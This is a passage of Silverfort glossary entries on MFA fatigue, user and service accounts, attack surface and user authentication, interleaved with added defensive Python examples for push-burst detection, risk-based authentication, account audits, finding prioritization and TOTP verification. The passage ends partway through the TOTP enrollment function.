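Two of the mitigations just listed, detecting the prompt flood and limiting the number of prompts, can be built from the MFA service's push-prompt events alone. The following is an added example for this entry, not Silverfort code; the event fields, the ten-minute window, the three-prompt limit and the "fall back to code entry" policy are assumptions. The detector flags a burst of denied or ignored pushes and escalates if an approval follows inside the same window (the sequence the bullet list describes); the throttle refuses to send further pushes once the limit is hit, so the later prompts in the burst would never reach the user's phone.

```python
"""MFA push-burst detection and per-user prompt throttling (added example, constructed data)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed push-prompt events from an MFA service (not real data).
# outcome: "approved", "denied", or "timeout" (prompt ignored until it expired).
SAMPLE_PUSH_EVENTS = [
    {"ts": "2024-05-02T02:10:00Z", "user": "alice", "src_ip": "198.51.100.20", "outcome": "timeout"},
    {"ts": "2024-05-02T02:11:00Z", "user": "alice", "src_ip": "198.51.100.20", "outcome": "denied"},
    {"ts": "2024-05-02T02:12:00Z", "user": "alice", "src_ip": "198.51.100.20", "outcome": "timeout"},
    {"ts": "2024-05-02T02:13:00Z", "user": "alice", "src_ip": "198.51.100.20", "outcome": "denied"},
    {"ts": "2024-05-02T02:14:00Z", "user": "alice", "src_ip": "198.51.100.20", "outcome": "approved"},
    {"ts": "2024-05-02T09:00:00Z", "user": "bob", "src_ip": "10.0.0.9", "outcome": "approved"},
]


def _parse(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def detect_push_bursts(events, window=timedelta(minutes=10), max_unapproved=3):
    """Alert when a user gets >= max_unapproved unapproved pushes inside `window`,
    and escalate when an approval arrives while such a burst is still open."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_user[ev["user"]].append(ev)
    alerts = []
    for user, evs in by_user.items():
        recent = deque()          # timestamps of unapproved prompts inside the window
        burst_reported = False
        for ev in evs:
            ts = _parse(ev["ts"])
            while recent and ts - recent[0] > window:
                recent.popleft()
            if ev["outcome"] == "approved":
                if len(recent) >= max_unapproved:
                    alerts.append({"rule": "approval_after_push_burst", "user": user,
                                   "src_ip": ev["src_ip"], "unapproved": len(recent),
                                   "ts": ev["ts"]})
                recent.clear()
                burst_reported = False
                continue
            recent.append(ts)
            if len(recent) >= max_unapproved and not burst_reported:
                burst_reported = True
                alerts.append({"rule": "mfa_push_burst", "user": user,
                               "src_ip": ev["src_ip"], "unapproved": len(recent),
                               "ts": ev["ts"]})
    return alerts


class PushThrottle:
    """Per-user prompt limiter (assumed policy): once a user has max_unapproved
    unapproved pushes inside the window, no further push is sent; the login must
    instead complete with a typed code, which the attacker cannot satisfy by
    nagging the user."""

    def __init__(self, window=timedelta(minutes=10), max_unapproved=3):
        self.window = window
        self.max_unapproved = max_unapproved
        self.unapproved = defaultdict(deque)

    def request_push(self, user, now):
        q = self.unapproved[user]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_unapproved:
            return "deny_push_require_code"
        return "send_push"

    def record_outcome(self, user, ts, outcome):
        if outcome == "approved":
            self.unapproved[user].clear()
        else:
            self.unapproved[user].append(ts)


def replay_throttle(events, **kwargs):
    """Replay logged prompts through the throttle; returns one decision per event.
    Outcomes are only recorded for prompts the throttle actually sent."""
    throttle = PushThrottle(**kwargs)
    decisions = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = _parse(ev["ts"])
        decision = throttle.request_push(ev["user"], ts)
        decisions.append(decision)
        if decision == "send_push":
            throttle.record_outcome(ev["user"], ts, ev["outcome"])
    return decisions


if __name__ == "__main__":
    for alert in detect_push_bursts(SAMPLE_PUSH_EVENTS):
        print(alert)
    print(replay_throttle(SAMPLE_PUSH_EVENTS))
```

On the constructed sample the detector raises a burst alert at the third unapproved push and an escalated alert when alice finally approves the fifth, while the throttle would have withheld pushes four and five entirely; bob's single approved prompt is untouched.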
### Best Practices for Mitigating MFA Fatigue

To mitigate MFA fatigue, organizations should implement best practices that balance security and usability. MFA solutions should offer flexible options that suit different user needs and risk profiles. For example, SMS codes may suffice for low-risk accounts, while high-value accounts require stronger authentication like security keys. Implementing a tiered approach with multiple methods at different assurance levels gives users choices appropriate to the sensitivity of their accounts and data.

User experience is critical. Solutions should have intuitive, streamlined interfaces that do not disrupt workflows. Options like single sign-on, risk-based authentication, and remember-me features can minimize repeated logins for low-risk scenarios. Providing clear communication about MFA benefits and options helps gain user buy-in and adoption.

Training and education are essential. Comprehensive programs should cover MFA concepts, available methods, how to use solutions securely, and the risks of account takeover and data breaches. Regular simulated phishing campaigns keep security top of mind for users.

Analytics and monitoring help identify and remediate issues. Tracking metrics such as login success and failure rates, MFA method usage, and reported issues provides insight into how well the program is functioning. Monitoring for anomalies can detect potential account compromise early.

MFA solutions must themselves be secure. Only trusted, certified options should be deployed. Solutions should support secure integration with identity providers and be hardened against vulnerabilities. Keys and credentials must be protected.

Following these best practices helps achieve the optimal balance of strong security and good usability in an MFA program. With the right combination of technology, policy, and people, organizations can mitigate MFA fatigue and gain widespread adoption of this critical security control.
### Evaluating Alternative Authentication Methods

To reduce reliance on passwords alone, organizations are implementing alternative authentication methods. Some options to consider include:

Biometric authentication, like fingerprint, face, or voice recognition, uses unique physical attributes to verify a user's identity. Biometrics are very difficult to replicate but require additional hardware like scanners. Biometrics also raise privacy concerns for some.

Security keys, like YubiKeys, provide two-factor authentication via a physical USB device. Security keys are very secure but require purchasing and distributing keys to all users. Keys can also be lost or stolen.

Behavioral biometrics track how a user typically interacts with systems and devices to recognize anomalies that could indicate fraud. Behavioral biometrics are passive and frictionless but still an emerging technology.

Adaptive authentication balances security and usability. It can reduce interruptions for legitimate users while detecting anomalies indicating compromised accounts. It considers the location, devices, login patterns and other fraud indicators, and when risk thresholds are crossed, it may then require multi-factor authentication.

Single sign-on (SSO) allows users to access multiple applications with one set of login credentials. SSO reduces the number of passwords for individuals to remember and manage. However, if compromised, SSO could provide access to many systems. SSO may also not work for all internal and third-party applications.

Choosing the right additional authentication methods depends on an organization's security needs, applications, resources, and user experience requirements. A layered security approach with MFA and SSO at a minimum is recommended to reduce dependence on static passwords. Continually evaluating new options as technology evolves is also advised to stay ahead of threats.
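The tiered approach from the best-practices section (SMS for low-risk accounts, security keys for high-value ones) and the adaptive authentication described just above combine naturally into one policy decision: score the attempt on location, device, login-time pattern and recent failures, then pick the factor from the account's tier and step it up, or block, only when a threshold is crossed. The following is an added example, not Silverfort code; the profile format, the weights, the thresholds and the factor ladder are assumptions chosen to illustrate the idea.

```python
"""Tiered, risk-based factor selection (added example, constructed data)."""
from datetime import datetime

# Constructed baselines built from each user's past successful logins (not real data).
PROFILES = {
    "alice": {"tier": "low", "countries": {"DE"}, "devices": {"alice-laptop"},
              "usual_hours": set(range(7, 19))},
    "bob": {"tier": "standard", "countries": {"DE", "FR"},
            "devices": {"bob-laptop", "bob-phone"}, "usual_hours": set(range(8, 20))},
    "carol": {"tier": "high", "countries": {"US"}, "devices": {"carol-laptop"},
              "usual_hours": set(range(6, 18))},
}

# Assumed tier policy: baseline factor per account sensitivity, and a ladder of
# increasing assurance used when risk calls for a step-up.
TIER_BASELINE = {"low": "sms", "standard": "authenticator_app", "high": "security_key"}
LADDER = ["sms", "authenticator_app", "security_key"]
BLOCK_AT, STEP_UP_AT, LOW_RISK_BELOW = 80, 50, 20   # assumed thresholds


def risk_score(attempt, profile):
    """Additive score over the fraud indicators named in the text (assumed weights)."""
    score, reasons = 0, []
    if attempt["country"] not in profile["countries"]:
        score += 40
        reasons.append("new_country")
    if attempt["device"] not in profile["devices"]:
        score += 30
        reasons.append("new_device")
    if attempt["time"].hour not in profile["usual_hours"]:
        score += 15
        reasons.append("unusual_hour")
    if attempt["recent_failures"] >= 3:
        score += 25
        reasons.append("recent_failures")
    return score, reasons


def stronger_than(factor):
    """Next rung on the assurance ladder (security_key is the ceiling)."""
    return LADDER[min(LADDER.index(factor) + 1, len(LADDER) - 1)]


def decide(user, attempt, profiles=PROFILES):
    """Return the access decision and the factor to demand, if any."""
    profile = profiles[user]
    score, reasons = risk_score(attempt, profile)
    tier = profile["tier"]
    if score >= BLOCK_AT:
        return {"action": "block", "factor": None, "score": score, "reasons": reasons}
    baseline = TIER_BASELINE[tier]
    if tier == "high":
        factor = "security_key"            # high-value accounts always use the strongest factor
    elif score >= STEP_UP_AT:
        factor = stronger_than(baseline)   # anomalies: step up from the tier's baseline
    elif tier == "low" and score < LOW_RISK_BELOW:
        factor = None                      # known device/location, usual hours: no prompt
    else:
        factor = baseline
    action = "allow" if factor is None else "require_mfa"
    return {"action": action, "factor": factor, "score": score, "reasons": reasons}


if __name__ == "__main__":
    now = datetime(2024, 5, 1, 10, 0)
    print(decide("alice", {"country": "DE", "device": "alice-laptop", "time": now, "recent_failures": 0}))
    print(decide("bob", {"country": "US", "device": "unknown", "time": now, "recent_failures": 3}))
```

The design point is that the prompt count for a legitimate user on a known device drops to zero (reducing fatigue) while an attacker with a stolen password on an unknown device from a new country is pushed to a security key or blocked; the reasons list goes to the log so a responder can see why a given login was challenged.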
### Conclusion

As cyberthreats continue to evolve, multi-factor authentication remains an important tool for organizations to leverage. However, implementers must remain vigilant about the risks of MFA fatigue to ensure maximum effectiveness and user adoption. By choosing MFA methods that balance security and convenience, educating users about threats, and providing alternatives for accessibility, organizations can reap the benefits of this critical safeguard while avoiding fatigue.

---
- Published: 2023-12-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/user-account/

A digital identity representing a specific person, used to authenticate and control access to systems, applications, and data.

A user account is an object that's created for an entity to enable it to access resources. Such an entity can represent a human being, software service, or a computer. User accounts allow these entities to log in, set preferences, and access resources based on their account permissions. The security of any system relies heavily on how well user accounts are managed.

User accounts provide individuals access to networks, devices, software, and data. For cybersecurity professionals, understanding what constitutes a user account and how they should be properly managed is crucial. With billions of accounts globally accessing sensitive data and systems, user accounts have become a prime target for cyber attacks. Protecting them is key to protecting digital infrastructure and assets. By following recommended guidelines for user account creation, management, monitoring, and control, organizations can strengthen their security posture and reduce account-based risks.

### Types of User Accounts

There are several types of user accounts in computing systems and networks:

- System accounts
- Administrator accounts
- Standard user accounts
- Guest accounts
- Local accounts
- Remote accounts

System accounts are created by the operating system and are used to run system services and processes.
These accounts have elevated access privileges to access system resources but are not used for interactive login.

Administrator accounts have full access permissions to make changes to the system. They are used to install software, configure settings, add or remove user accounts, and perform other administrative tasks. Administrator accounts should be limited to authorized personnel only.

Standard user accounts have basic access permissions to normal system resources and are used by general system users to log in and perform routine tasks. They have limited permissions to make system changes.

Guest accounts provide temporary access with limited permissions. They are often disabled by default for security.

Local accounts are stored on the local system and provide access only to that system. Network accounts are stored on a network domain controller and provide access to resources on the network.

Remote accounts allow users to log in to a system from a remote location over a network. Extra security measures should be implemented for remote access to safeguard systems and data.

Proper configuration and management of accounts are crucial for system and network security. Restricting administrative access and privileges can help reduce the risk of exploitation by bad actors.

### Service Accounts vs User Accounts

Service accounts and user accounts are two types of accounts in an IT system with distinct purposes and access levels.

A user account is an account assigned to an individual user to access a system. It typically requires a username and password for authentication and is used by a single person. User accounts should have limited permissions based only on a user's role and job responsibilities.

On the other hand, a service account is an account assigned to an application, software or service to interact with the system. Service accounts have a broad range of permissions needed to operate the service. They do not belong to any single user.
Some examples of services that may use service accounts include:

- Database services to access data
- Backup services to read and write files
- Monitoring services to check system health

Due to their high privileges, service accounts are common targets for cyber attacks and must be properly secured. Best practices for managing service accounts include:

- Assigning strong, complex passwords that are regularly rotated
- Monitoring for any unauthorized access
- Disabling any interactive login
- Applying the principle of least privilege by only granting necessary permissions
- Separating service accounts for different applications

Properly administering accounts by role, enforcing strong security policies, and limiting unnecessary access are critical for reducing risk and protecting systems. Failing to make a clear distinction between user and service accounts or not properly securing them can pose serious threats.

### How User Accounts Work: Authentication and Authorization

User accounts allow individuals to access computer systems and services. They work through the processes of user authentication and authorization.

Authentication verifies a user's identity. It typically involves a username and password, but can also use multi-factor methods like security keys, one-time passwords, and biometrics (fingerprints, facial recognition). The authentication method confirms that the user is who they claim to be before allowing them into the system.

Once authenticated, authorization determines what level of access the user has. It assigns permissions and privileges to access data, run programs, and perform specific actions based on the user's role. For example, an administrator account usually has full access, while a standard account has limited access. Authorization helps control what authenticated users can and cannot do within a system.

User accounts are created, managed, and deleted by system administrators. Admins determine what credentials and permissions are required for each role.
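The service-account best practices listed above (rotated passwords, no interactive login, least privilege, one account per application) are easiest to keep honest with a periodic audit over the account inventory. The following is an added example, not Silverfort code; the inventory fields, the 90-day rotation window and the idea that each application declares the permissions it needs are assumptions. It reports one finding per violated practice so the output can feed a ticket queue or a dashboard.

```python
"""Service-account hygiene audit over an account inventory (added example, constructed data)."""
from datetime import date

# Constructed inventory (not real accounts). `granted` is what the directory shows,
# `needed` is the permission set the owning application has declared, `used_by`
# lists the applications that authenticate with the account.
ACCOUNTS = [
    {"name": "svc-backup", "kind": "service", "interactive_logon": False,
     "password_last_set": date(2024, 4, 1), "used_by": ["backup"],
     "granted": {"read_files", "write_files"}, "needed": {"read_files", "write_files"}},
    {"name": "svc-monitor", "kind": "service", "interactive_logon": True,
     "password_last_set": date(2023, 1, 15), "used_by": ["monitoring", "reporting"],
     "granted": {"read_health", "admin"}, "needed": {"read_health"}},
    {"name": "svc-db", "kind": "service", "interactive_logon": False,
     "password_last_set": date(2024, 3, 20), "used_by": ["erp"],
     "granted": {"db_read", "db_write"}, "needed": {"db_read"}},
    {"name": "alice", "kind": "user", "interactive_logon": True,
     "password_last_set": date(2024, 4, 10), "used_by": [],
     "granted": {"read_files"}, "needed": {"read_files"}},
]


def audit_service_accounts(accounts, today, max_password_age_days=90):
    """Return one finding dict per violated practice; user accounts are skipped."""
    findings = []

    def report(acct, check, detail):
        findings.append({"account": acct["name"], "check": check, "detail": detail})

    for acct in accounts:
        if acct["kind"] != "service":
            continue
        # Practice: disable interactive login for service accounts.
        if acct["interactive_logon"]:
            report(acct, "interactive_logon_enabled", True)
        # Practice: strong passwords that are regularly rotated.
        age = (today - acct["password_last_set"]).days
        if age > max_password_age_days:
            report(acct, "password_rotation_overdue", age)
        # Practice: separate service accounts for different applications.
        if len(acct["used_by"]) > 1:
            report(acct, "shared_across_applications", sorted(acct["used_by"]))
        # Practice: least privilege; anything granted beyond the declared need.
        excess = acct["granted"] - acct["needed"]
        if excess:
            report(acct, "excess_permissions", sorted(excess))
    return findings


def findings_by_account(findings):
    """Group check names per account for a quick summary view."""
    summary = {}
    for f in findings:
        summary.setdefault(f["account"], []).append(f["check"])
    return summary


if __name__ == "__main__":
    for f in audit_service_accounts(ACCOUNTS, date.today()):
        print(f"{f['account']:<12} {f['check']:<28} {f['detail']}")
```

In the constructed inventory svc-backup passes every check, svc-db only over-grants write access, and svc-monitor trips all four rules, which is the pattern (interactive, stale, shared, over-privileged) that turns a service account into an attractive target.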
They monitor accounts for signs of compromise like failed login attempts, and deactivate or remove accounts when users no longer need access.

Securing user accounts is crucial for any organization. Following best practices like strong, unique passwords, limiting privileges, and monitoring for suspicious activity helps prevent unauthorized access and protects sensitive systems and data. Implementing multi-factor authentication and single sign-on where possible adds an extra layer of protection for user accounts.

With the increasing sophistication of cyber threats, robust user account security has never been more important. Well-designed authentication, authorization, and account management policies and controls are essential for ensuring that only verified individuals gain access to systems and information. Continuous monitoring and adapting to evolving risks help keep user accounts, and the assets they protect, secure.

### Why User Accounts Matter for Cyber Security

User accounts are a key part of security, privacy and usability. They:

- Control access to resources by assigning permissions to accounts based on roles and responsibilities. This prevents unauthorized access.
- Enable authentication through passwords, biometrics or security keys. This verifies a user's identity before granting them access.
- Allow for personalization and customization of settings, applications, and workflows for each individual.
- Provide accountability by linking access and changes to a specific account. This allows monitoring user activity and an audit trail.
- Increase productivity by remembering preferences and past interactions. This provides a seamless experience for users.

User accounts are fundamental components of any computer system, application or service. They make technology accessible, secure, and personalized for all users.
### Best Practices for Managing User Accounts

To effectively manage user accounts, organizations should implement best practices around account creation, authentication, authorization, and auditing.

When creating accounts, administrators should collect only the minimum information needed and be transparent in how data will be used. Requiring strong, unique passwords and two-factor authentication helps prevent unauthorized access.

Strict authorization controls should limit users' access to only the systems and data they need to perform their jobs. The principle of least privilege, granting the fewest privileges needed, reduces risk. Access should be reviewed periodically and revoked immediately upon termination.

Routine auditing and monitoring of accounts is essential. Analytics tools can detect anomalous behavior indicating compromised accounts or insider threats. Audit logs should be reviewed regularly and retained according to legal and regulatory requirements. Attention to stale user accounts should also be prioritized.

User education and training are also critical. Employees should understand policies around password hygiene, phishing identification, and data handling. Regular reminders and simulated phishing campaigns help reinforce good practices.

Diligently implementing these best practices helps organizations reduce risk, comply with regulations, and build trust.

### Conclusion

User accounts are crucial components of an organization's cybersecurity infrastructure. They provide access control and accountability by linking individuals to their online identities and the permissions granted to those accounts. Carefully managing user accounts, including proper provisioning, monitoring, and deprovisioning, is essential for maintaining a secure digital environment. User accounts are the gateway through which employees access sensitive data and critical systems, so protecting them must be a top priority for any cybersecurity professional.
---
- Published: 2023-12-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/attack-surface/

The comprehensive set of digital and physical vulnerabilities and entry points through which an attacker might gain unauthorized access to a system or network.

The attack surface refers to all the vulnerabilities and entry points that could be exploited by unauthorized users within a given environment. It encompasses both digital and physical components that attackers target to gain unauthorized access.

The digital attack surface includes network interfaces, software, hardware, data, and users. Network interfaces like Wi-Fi and Bluetooth are common targets. Vulnerable software and firmware provide opportunities for injection or buffer overflow attacks. Compromised user credentials and accounts, often obtained through social engineering attacks, are frequently used to gain access to the system.

The physical attack surface refers to the tangible components that can be tampered with to infiltrate a system. This includes unattended workstations, improperly secured server racks, vulnerable wiring, and insecure building access. Attackers may install keylogging devices, steal data storage devices, or gain access to networks by bypassing physical security controls.

### What vulnerabilities constitute an attack surface?

A system's attack surface consists of any weaknesses or flaws that can be exploited to gain unauthorized access to data. Potential vulnerabilities include:

- Software and hardware components
- Network infrastructure
- User access and credentials
- System configurations
- Physical security

### Attack Vector vs Attack Surface

Attack vectors describe the path or means by which an attacker can gain access to a system, such as through malware, phishing emails, USB drives, or software vulnerabilities. The attack surface is the number of possible attack vectors that can be used to attack a system.
Reducing the attack surface requires identifying and eliminating as many vulnerabilities as possible across all potential attack vectors. This can be achieved through measures like patching software, restricting user permissions, disabling unused ports or services, implementing multi-factor authentication (MFA), and deploying updated antivirus or anti-malware solutions.

An optimized attack surface not only strengthens security posture but also allows cybersecurity teams to focus resources on monitoring and protecting critical assets. When the number of vulnerabilities is minimized, there are fewer opportunities for attackers to compromise a system, and security professionals can better allocate time and tools to defend high-value targets and respond to threats.

### Mapping the Attack Surface: Assets, Entry Points, and Vulnerabilities

Mapping the attack surface involves identifying the organization's digital assets, potential entry points, and existing vulnerabilities.

Digital assets encompass anything connected to the network that stores or processes data, including:

- Servers
- Endpoint devices (e.g. desktops, laptops, mobile devices)
- Networking equipment (e.g. routers, switches, firewalls)
- Internet of Things (IoT) devices (e.g. security cameras, HVAC systems)

Entry points refer to any path that could be exploited to gain access to the network, such as:

- Public-facing web applications
- Remote access software
- Wireless networks
- USB ports

Vulnerabilities are weaknesses in an asset or entry point that could be leveraged in an attack, for instance:

- Unpatched software
- Default or weak passwords
- Improper access controls
- Lack of encryption

By gaining visibility into all digital assets, entry points, and vulnerabilities across the organization, security teams can work to reduce the overall attack surface and strengthen cyber defenses.
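Once assets, entry points and vulnerabilities have been mapped, the practical question is which finding to fix first, and the mapping itself answers it: a weakness on an internet-facing entry point is reachable by anyone, while the same weakness on an internal-only service is not. The following is an added example of that exposure-based prioritization, not Silverfort code; the inventory format, the severity weights, the doubling for internet-facing services and the remediation strings are assumptions. It also applies the first reduction step named above (disabling unused internet-facing services) and shows how the entry-point count and the finding list shrink as a result.

```python
"""Exposure-based prioritization of attack-surface findings (added example, constructed data)."""
import copy

# Constructed inventory of assets and the services they expose (not real hosts).
INVENTORY = [
    {"asset": "web-01", "type": "server", "services": [
        {"name": "https", "port": 443, "internet_facing": True, "in_use": True,
         "findings": ["unpatched_software"]},
        {"name": "ftp", "port": 21, "internet_facing": True, "in_use": False,
         "findings": ["lack_of_encryption", "default_or_weak_password"]},
    ]},
    {"asset": "vpn-01", "type": "network", "services": [
        {"name": "remote_access", "port": 443, "internet_facing": True, "in_use": True,
         "findings": ["improper_access_controls"]},
    ]},
    {"asset": "db-01", "type": "server", "services": [
        {"name": "postgres", "port": 5432, "internet_facing": False, "in_use": True,
         "findings": ["unpatched_software"]},
    ]},
    {"asset": "cam-lobby", "type": "iot", "services": [
        {"name": "http", "port": 80, "internet_facing": False, "in_use": True,
         "findings": ["default_or_weak_password"]},
    ]},
]

# Assumed base severity per vulnerability class from the list above, and the
# multiplier applied when the weakness sits on an internet-facing entry point.
BASE_SEVERITY = {"unpatched_software": 6, "default_or_weak_password": 7,
                 "improper_access_controls": 5, "lack_of_encryption": 4}
EXPOSURE_MULTIPLIER = {True: 2.0, False: 1.0}
REMEDIATION = {
    "unpatched_software": "apply vendor patches",
    "default_or_weak_password": "set a unique strong password; remove default account",
    "improper_access_controls": "restrict access and require MFA",
    "lack_of_encryption": "enable TLS or retire the protocol",
}


def entry_points(inventory):
    """Internet-facing services: the externally reachable entry points."""
    return [(a["asset"], s["name"], s["port"])
            for a in inventory for s in a["services"] if s["internet_facing"]]


def prioritize_findings(inventory):
    """Score every finding by severity and exposure; an unused internet-facing
    service is collapsed into one 'disable it' row whose score is the sum of the
    findings it would remove, since closing the port fixes all of them at once."""
    rows = []
    for a in inventory:
        for s in a["services"]:
            mult = EXPOSURE_MULTIPLIER[s["internet_facing"]]
            scores = {f: BASE_SEVERITY[f] * mult for f in s["findings"]}
            if s["internet_facing"] and not s["in_use"]:
                rows.append({"asset": a["asset"], "service": s["name"],
                             "finding": "unused_internet_facing_service",
                             "score": sum(scores.values()),
                             "action": f"disable service / close port {s['port']}"})
                continue
            for f, score in scores.items():
                rows.append({"asset": a["asset"], "service": s["name"], "finding": f,
                             "score": score, "action": REMEDIATION[f]})
    rows.sort(key=lambda r: (-r["score"], r["asset"], r["finding"]))
    return rows


def reduce_attack_surface(inventory):
    """First reduction step from the text: drop unused internet-facing services.
    Returns a new inventory; the input is left untouched."""
    reduced = copy.deepcopy(inventory)
    for a in reduced:
        a["services"] = [s for s in a["services"]
                         if not (s["internet_facing"] and not s["in_use"])]
    return reduced


if __name__ == "__main__":
    for r in prioritize_findings(INVENTORY):
        print(f"{r['score']:5.1f}  {r['asset']:<10} {r['service']:<14} {r['finding']:<32} {r['action']}")
    print("entry points before:", len(entry_points(INVENTORY)),
          "after:", len(entry_points(reduce_attack_surface(INVENTORY))))
```

On the constructed inventory the unused FTP service on the web server ranks first even though no single finding on it is the most severe, because removing it eliminates two exposed weaknesses and an entry point in one change; the identical unpatched-software finding scores twice as high on the internet-facing web server as on the internal database.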
This may involve activities such as disabling unnecessary entry points, implementing stronger access controls, deploying software updates, and educating users on security best practices.

Continuously monitoring the attack surface is key to maintaining robust cybersecurity. As new technologies are adopted and networks become more complex, the attack surface will inevitably evolve, creating new security risks that must be identified and mitigated.

### Attack Surface Reduction: Eliminating Entry Points and Hardening Assets

Reducing an organization's attack surface involves eliminating potential entry points and hardening critical assets. This includes removing unused internet-facing services and unused open ports, decommissioning legacy systems, and patching known vulnerabilities across the infrastructure.

Strict access control and least-privilege policies should be implemented to limit adversary access to sensitive data and systems. MFA and single sign-on (SSO) solutions provide additional account protection. Regularly auditing user and group access rights to ensure they are still appropriate and revoking unused credentials minimizes the attack surface.

Firewalls, routers and servers should be hardened through disabling unused functionality, removing default accounts, and enabling logging and monitoring. Keeping software up to date with the latest patches prevents known vulnerabilities from being exploited.

Network segmentation and micro-segmentation compartmentalize the infrastructure into smaller, isolated sections. This way, if an adversary gains access to one segment, lateral movement to other areas is restricted. Zero-trust models should be applied, where no part of the network is implicitly trusted.

Conducting regular risk assessments, vulnerability scans, and penetration tests identifies weaknesses in the infrastructure before they can be exploited. Closing security gaps and remediating high and critical risk findings reduce the overall attack surface.
Maintaining a minimal attack surface requires continuous effort and resources to identify new risks, reassess existing controls, and make improvements. However, the investment in a robust security posture yields substantial benefits, allowing organizations to operate with confidence in today's threat landscape. Overall, concentrating on eliminating entry points, hardening critical assets, and adopting a zero-trust approach is key to successfully reducing the attack surface.

### Identity as an Attack Surface

Identity is an increasingly important attack surface for organizations to manage. As companies adopt cloud services and employees access critical systems remotely, identity and access management becomes crucial to security.

Weak, stolen, or compromised credentials pose a significant gap. Attackers often target users' login details, since gaining control of an authorized account can grant access to an organization's resources. Phishing emails and malware aim to trick users into providing usernames and passwords. Once user credentials have been obtained, attackers can use them to log in and access sensitive data, deploy ransomware, or maintain persistence within the network.

MFA adds an extra layer of identity protection. Requiring not just a password but also a code sent to a mobile device or hardware token helps prevent unauthorized access, even if the password is stolen. Adaptive authentication takes this a step further by analyzing user behavior and locations to detect anomalies that could signal account compromise.

Privileged Access Management (PAM) limits what authenticated users can do within systems and applications. Providing administrators only the minimum level of access needed to do their jobs reduces the potential impact of a compromised account. Strictly controlling and monitoring privileged accounts, which have the highest level of access, is especially important.
Managing external access for third parties like contractors or business partners introduces more risks. Ensuring partners follow strong security practices and limiting their access to only what is necessary is key. Terminating all access when relationships end is equally important.

Effective identity and access management involves balancing security and usability. Overly complex controls can frustrate employees and reduce productivity, but weak access policies leave organizations vulnerable. With the right strategy and solutions in place, companies can reduce identity-based risks while enabling business operations.

### Continuous Attack Surface Management: A Security Best Practice

Continuous attack surface management is a recommended best practice in cybersecurity. It refers to the ongoing process of discovering, cataloging, and mitigating vulnerabilities across an organization's entire attack surface, which includes all digital assets, connections and access points that could be targeted.

#### Discovery

The first step is discovering and mapping all components of the attack surface, including:

- Networks, servers, endpoints, mobile devices, IoT devices, web applications, software, etc.
- All external connections and access points to these assets, like WiFi networks, VPNs, third-party integrations, etc.
- Any vulnerabilities, misconfigurations or weaknesses associated with these components that could be exploited, for example through social engineering.

#### Monitoring

Once the attack surface has been mapped, continuous monitoring is required. As new digital assets, connections and technologies are added, the attack surface changes and expands, creating new vulnerabilities. Continuous monitoring tracks these changes to identify new vulnerabilities and keep the attack surface map up to date.

#### Remediation

With visibility into the attack surface and vulnerabilities, security teams can then prioritize and remediate risks.
This includes patching software, updating configurations, implementing additional security controls, decommissioning unneeded assets, and restricting access. Remediation efforts must also be continuous to address new vulnerabilities as they emerge.

Continuous attack surface management is an iterative process that allows organizations to shrink their attack surface over time through discovery, monitoring, and remediation. By maintaining a complete and updated understanding of the attack surface, security teams can better defend digital assets and prevent successful breaches.

---

- Published: 2023-12-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/user-authentication/

The process of verifying an individual's claimed identity (e.g., via passwords, tokens, or biometrics) before granting access to systems or resources.

User authentication is the process of verifying that users are who they claim to be. It is a crucial part of cybersecurity, enabling organizations to control access to systems and data. There are three main types of authentication factors:

- Something you know - like a password, PIN, or security question. This is the most common method but also the weakest, since this information can be stolen or guessed.
- Something you have - such as a security token, smart card, or authentication app. These physical devices provide an extra layer of security but can still be lost or stolen.
- Something you are - biometrics like fingerprints, facial recognition, or iris scans. Biometrics are very secure since they are unique to each individual, but they do require extra hardware like scanners.

Multi-factor authentication (MFA) combines multiple factors, like a password and security token, for stronger protection. It helps prevent unauthorized access even if one factor is compromised. Federated identity management (FIM) uses a single set of login credentials across multiple systems and applications.
It provides a seamless user experience while still enabling strong authentication.

Robust user authentication with MFA and FIM is essential for securing access in today's organizations. It protects sensitive data and resources from potential threats like account takeover attacks, unauthorized access, and identity theft. With the rise of remote work and cloud services, user authentication has become more critical than ever.

### How Does User Authentication Work?

The user authentication process typically involves three steps:

1. Registration or enrollment: The user provides details to set up their identity, such as a username and password. Biometric data like fingerprints or facial scans may also be collected.
2. Presenting credentials: The user enters their login credentials, such as a username and password, or provides a biometric scan to access a system or service.
3. Verification: The system compares the credentials entered to the registered details to verify the user's identity. If the details match, the user is granted access. If not, access is denied.

Modern authentication methods have additional safeguards to strengthen security. Multi-factor authentication requires not just a password but also a code sent to the user's mobile phone or generated by an authentication app. Biometric authentication uses fingerprint, face, or iris scans, which are very difficult to replicate. Contextual authentication considers a user's location, device, and behavior to detect anomalies that could indicate fraud. Behavioral biometrics track how a user typically types, taps, and swipes to build a personal profile for continuous authentication.

Robust user authentication is essential to protect sensitive data and systems from unauthorized access, especially as cyber threats become more sophisticated. Organizations must implement strong, multi-layered authentication and stay up to date with the latest identification technologies to minimize risks in today's digital world.
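As an added example (not code from this page or from Silverfort), the three-step flow above in Python: `register` is the enrollment step, and `authenticate` performs the verification step for a presented password (something you know) together with a rotating authenticator-app code (something you have), using the standard HOTP/TOTP construction from RFC 4226 and RFC 6238. The in-memory user store, the PBKDF2 iteration count and the user names are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import os
import secrets
import struct
import time

# Work factor and TOTP parameters are assumptions for this example.
PBKDF2_ITERATIONS = 200_000
TOTP_STEP = 30      # seconds per code, as used by common authenticator apps
TOTP_DIGITS = 6

# Constructed in-memory user store; a real deployment would use a directory or database.
USER_STORE = {}


def hotp(secret: bytes, counter: int, digits: int = TOTP_DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def totp(secret: bytes, at=None) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from the current 30-second time step."""
    now = time.time() if at is None else at
    return hotp(secret, int(now // TOTP_STEP))


def register(username: str, password: str) -> str:
    """Step 1, enrollment: store a salted password hash plus a fresh TOTP secret.

    Returns the base32 secret the user would load into an authenticator app.
    """
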